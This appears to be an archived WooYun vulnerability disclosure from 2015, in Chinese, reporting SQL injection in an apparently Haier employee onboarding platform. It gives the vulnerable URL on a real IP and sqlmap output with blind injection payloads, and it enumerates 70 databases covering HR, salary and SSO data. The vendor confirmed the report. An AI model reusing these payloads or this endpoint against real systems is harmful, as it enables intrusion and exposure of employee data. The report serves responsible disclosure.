乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-23: 细节已通知厂商并且等待厂商处理中 2015-03-23: 厂商已经确认,细节仅向厂商公开 2015-04-02: 细节向核心白帽子及相关领域专家公开 2015-04-12: 细节向普通白帽子公开 2015-04-22: 细节向实习白帽子公开 2015-05-07: 细节向公众公开
http://123.234.41.28
员工入职服务平台,存在SQL注入
http://123.234.41.28:80//ashx/check_login.ashx?callback=flightHandler&id=1&_=1426936653601
id参数
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: callback=flightHandler&id=1' AND 4939=4939 AND 'xXWt'='xXWt&_=1426936653601 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: callback=flightHandler&id=-5892' OR 9737=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'bZAo'='bZAo&_=1426936653601---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: callback=flightHandler&id=1' AND 4939=4939 AND 'xXWt'='xXWt&_=1426936653601 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: callback=flightHandler&id=-5892' OR 9737=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'bZAo'='bZAo&_=1426936653601---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [70]:[*] database_name[*] EffCeshi[*] EmployeeRegister[*] H3[*] H3_BPA[*] H3_Log[*] HaierMedical[*] HRAddImpel[*] HRBalanceQY[*] HRCareer[*] HRCareerDev[*] HRCatFish[*] HRChange[*] HRChaoLi[*] HRCompete[*] HRConfig[*] HRConfigEx[*] HRContracts[*] HREfficiency[*] HREmployee[*] HRExEmployee[*] HRIDP[*] HRIntranet[*] HRIntranetM[*] HRLayout[*] HRLearning[*] HRLGT[*] HRMicroMemAes[*] HRMicroMemQY[*] HRMicroOverAes[*] HRMicroOverMemAes[*] HRMicroQY[*] HRMicroQY2[*] HRMicroTodo[*] HROpen[*] HROpenData[*] HROT[*] HROverCapacity[*] HRPBC[*] HRPDFA[*] HRPension[*] HRPosition[*] HRQDan[*] HRSalary[*] HRSalaryNew[*] HRSalaryNew2012[*] HRSalaryNew2013[*] HRSeparation[*] HRSeparation20140807[*] HRShare[*] HRShiXiHeTong[*] HRSupplier[*] HRTrainee[*] HRTraineeJC[*] HRUniversityTrain[*] HRVacation[*] HRWorkerOD[*] HRXiaoLv[*] master[*] model[*] msdb[*] newtable[*] OA[*] Plan[*] ServerModeGridProjects[*] SSO[*] tempdb[*] VHRChaoLi[*] VHREfficiency[*] VHREmployee
70个库,HR信息我就不去查看了~
危害等级:高
漏洞Rank:11
确认时间:2015-03-23 14:54
谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理
暂无